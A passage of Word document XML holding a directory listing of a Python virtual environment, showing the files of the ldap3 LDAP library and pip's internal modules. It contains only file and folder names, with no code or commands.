      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DDE0AB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./venv/lib/python3.9/site-packages/ldap3/extend/novell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4DA79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checkGroupsMemberships.py  listReplicas.py              partition_entry_count.py    startTransaction.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022D3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endTransaction.py          nmasGetUniversalPassword.py  removeMembersFromGroups.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030D1D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addMembersToGroups.py  getBindDn.py               nmasSetUniversalPassword.py  replicaInfo.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293A2617" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D3F8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./venv/lib/python3.9/site-packages/ldap3/extend/novell/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF8F2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getBindDn.cpython-39.pyc                 partition_entry_count.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75819B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addMembersToGroups.cpython-39.pyc      listReplicas.cpython-39.pyc              removeMembersFromGroups.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082FC07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checkGroupsMemberships.cpython-39.pyc  nmasGetUniversalPassword.cpython-39.pyc  replicaInfo.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF6CFC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endTransaction.cpython-39.pyc          nmasSetUniversalPassword.cpython-39.pyc  startTransaction.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DAA28" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC5A8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./venv/lib/python3.9/site-packages/ldap3/extend/standard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDC67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PagedSearch.py  PersistentSearch.py  __init__.py  __pycache__  modifyPassword.py  whoAmI.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5189A7E8" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FB5DA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./venv/lib/python3.9/site-packages/ldap3/extend/standard/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44987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PagedSearch.cpython-39.pyc       __init__.cpython-39.pyc        whoAmI.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389B2F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PersistentSearch.cpython-39.pyc  modifyPassword.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3470B8C4" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636CFD1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./venv/lib/python3.9/site-packages/ldap3/operation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673707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abandon.py  bind.py     delete.py    modify.py    search.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451706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add.py      compare.py  extended.py  modifyDn.py  unbind.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F64D2E2" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FADD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./venv/lib/python3.9/site-packages/ldap3/operation/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28114B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bind.cpython-39.pyc     extended.cpython-39.pyc  search.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A79F9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abandon.cpython-39.pyc   compare.cpython-39.pyc  modify.cpython-39.pyc    unbind.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745B4AC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add.cpython-39.pyc       delete.cpython-39.pyc   modifyDn.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4FFE1E" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D4B8A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./venv/lib/python3.9/site-packages/ldap3/protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBD1D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controls.py  formatters    novell.py  persistentSearch.py  rfc2849.py  rfc4511.py  rfc4527.py  schemas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5127B6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convert.py   microsoft.py  oid.py     rfc2696.py           rfc3062.py  rfc4512.py  sasl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B89CD56" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709757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./venv/lib/python3.9/site-packages/ldap3/protocol/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7912FB1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novell.cpython-39.pyc            rfc2849.cpython-39.pyc  rfc4527.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6838D0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controls.cpython-39.pyc   oid.cpython-39.pyc               rfc3062.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B1B1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convert.cpython-39.pyc    persistentSearch.cpython-39.pyc  rfc4511.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E73E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microsoft.cpython-39.pyc  rfc2696.cpython-39.pyc           rfc4512.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4752BA15" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB993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./venv/lib/python3.9/site-packages/ldap3/protocol/formatters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295657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formatters.py  standard.py  validators.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7055B35B" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22CEA8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./venv/lib/python3.9/site-packages/ldap3/protocol/formatters/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1061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formatters.cpython-39.pyc  standard.cpython-39.pyc  validators.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288B29A2" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC8EA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./venv/lib/python3.9/site-packages/ldap3/protocol/sasl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE1578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digestMd5.py  external.py  kerberos.py  plain.py  sasl.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E7C95C" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312496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./venv/lib/python3.9/site-packages/ldap3/protocol/sasl/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BA222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external.cpython-39.pyc  plain.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BCBF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digestMd5.cpython-39.pyc  kerberos.cpython-39.pyc  sasl.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421CDDAA" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68709D7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./venv/lib/python3.9/site-packages/ldap3/protocol/schemas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4356E9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ad2012R2.py  ds389.py  edir888.py  edir914.py  slapd24.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78506CB0" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406695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./venv/lib/python3.9/site-packages/ldap3/protocol/schemas/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6FCF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ds389.cpython-39.pyc    edir914.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E666D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ad2012R2.cpython-39.pyc  edir888.cpython-39.pyc  slapd24.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A84A50A" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DBC58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./venv/lib/python3.9/site-packages/ldap3/strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8CFE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asyncStream.py   base.py          mockAsync.py  mockSync.py     reusable.py         safeSync.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FCA2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asynchronous.py  ldifProducer.py  mockBase.py   restartable.py  safeRestartable.py  sync.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B053CDE" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FCE7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./venv/lib/python3.9/site-packages/ldap3/strategy/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4F53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ldifProducer.cpython-39.pyc  restartable.cpython-39.pyc      sync.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D563A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asyncStream.cpython-39.pyc   mockAsync.cpython-39.pyc     reusable.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002905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asynchronous.cpython-39.pyc  mockBase.cpython-39.pyc      safeRestartable.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6811B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base.cpython-39.pyc          mockSync.cpython-39.pyc      safeSync.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7CE848" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE7F89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./venv/lib/python3.9/site-packages/ldap3/utils:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643851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asn1.py    config.py  dn.py      log.py   ordDict.py          repr.py          uri.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9E98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ciDict.py  conv.py    hashed.py  ntlm.py  port_validators.py  tls_backport.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6255B1A5" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C8CE8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./venv/lib/python3.9/site-packages/ldap3/utils/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CE9C5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conv.cpython-39.pyc    ntlm.cpython-39.pyc             tls_backport.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55515E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asn1.cpython-39.pyc      dn.cpython-39.pyc      ordDict.cpython-39.pyc          uri.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D93B5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ciDict.cpython-39.pyc    hashed.cpython-39.pyc  port_validators.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A325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config.cpython-39.pyc    log.cpython-39.pyc     repr.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF280F" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E08C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./venv/lib/python3.9/site-packages/ldap3-2.9.1.dist-info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7179498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COPYING.LESSER.txt  COPYING.txt  INSTALLER  LICENSE.txt  METADATA  RECORD  REQUESTED  WHEEL  top_level.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505D45F" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB119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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435C16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__main__.py  __pycache__  _internal  _vendor  py.typed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49606A" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53048D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./venv/lib/python3.9/site-packages/pip/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE4D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__main__.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA55B13" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A3B9F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4521752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cache.py  configuration.py  index      metadata  operations    resolution              vcs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F97EC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cli       distributions     locations  models    pyproject.py  self_outdated_check.py  wheel_builder.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7255DF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build_env.py  commands  exceptions.py     main.py    network   req           utils</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63616E70" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD6AB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./venv/lib/python3.9/site-packages/pip/_internal/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658623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configuration.cpython-39.pyc  pyproject.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6610DDE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build_env.cpython-39.pyc  exceptions.cpython-39.pyc     self_outdated_check.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301CE22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cache.cpython-39.pyc      main.cpython-39.pyc           wheel_builder.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1C8460" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640F360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./venv/lib/python3.9/site-packages/pip/_internal/cli:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3698C4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autocompletion.py  cmdoptions.py       main.py         parser.py         req_command.py  status_codes.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC945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base_command.py    command_context.py  main_parser.py  progress_bars.py  spinners.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D876592" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E50704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./venv/lib/python3.9/site-packages/pip/_internal/cli/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF100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cmdoptions.cpython-39.pyc       main_parser.cpython-39.pyc    req_command.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB7C51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autocompletion.cpython-39.pyc  command_context.cpython-39.pyc  parser.cpython-39.pyc         spinners.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B109AF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base_command.cpython-39.pyc    main.cpython-39.pyc             progress_bars.cpython-39.pyc  status_codes.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07158B2A" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60887BC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./venv/lib/python3.9/site-packages/pip/_internal/commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F01AA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cache.py  completion.py     debug.py     freeze.py  help.py   install.py  search.py  uninstall.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF050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check.py  configuration.py  download.py  hash.py    index.py  list.py     show.py    wheel.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77466B12" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638699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./venv/lib/python3.9/site-packages/pip/_internal/commands/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBA0A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debug.cpython-39.pyc     index.cpython-39.pyc    uninstall.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25329B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cache.cpython-39.pyc          download.cpython-39.pyc  install.cpython-39.pyc  wheel.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21859C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check.cpython-39.pyc          freeze.cpython-39.pyc    list.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE4043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completion.cpython-39.pyc     hash.cpython-39.pyc      search.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F83040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configuration.cpython-39.pyc  help.cpython-39.pyc      show.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D7985" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016BD76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./venv/lib/python3.9/site-packages/pip/_internal/distributions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21328C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base.py  installed.py  sdist.py  wheel.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B323EE3" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A349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./venv/lib/python3.9/site-packages/pip/_internal/distributions/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3050D3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base.cpython-39.pyc  installed.cpython-39.pyc  sdist.cpython-39.pyc  wheel.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC41D7" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D6A1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./venv/lib/python3.9/site-packages/pip/_internal/index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7232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collector.py  package_finder.py  sources.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170B4AC9" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2740B1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./venv/lib/python3.9/site-packages/pip/_internal/index/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E3631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collector.cpython-39.pyc  package_finder.cpython-39.pyc  sources.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E1212" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E821C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./venv/lib/python3.9/site-packages/pip/_internal/locations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6445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_distutils.py  _sysconfig.py  base.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC19B6B" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577412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./venv/lib/python3.9/site-packages/pip/_internal/locations/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF7A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_distutils.cpython-39.pyc  _sysconfig.cpython-39.pyc  base.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704DA295" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D631F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./venv/lib/python3.9/site-packages/pip/_internal/metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB09E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base.py  pkg_resources.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C700A5" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
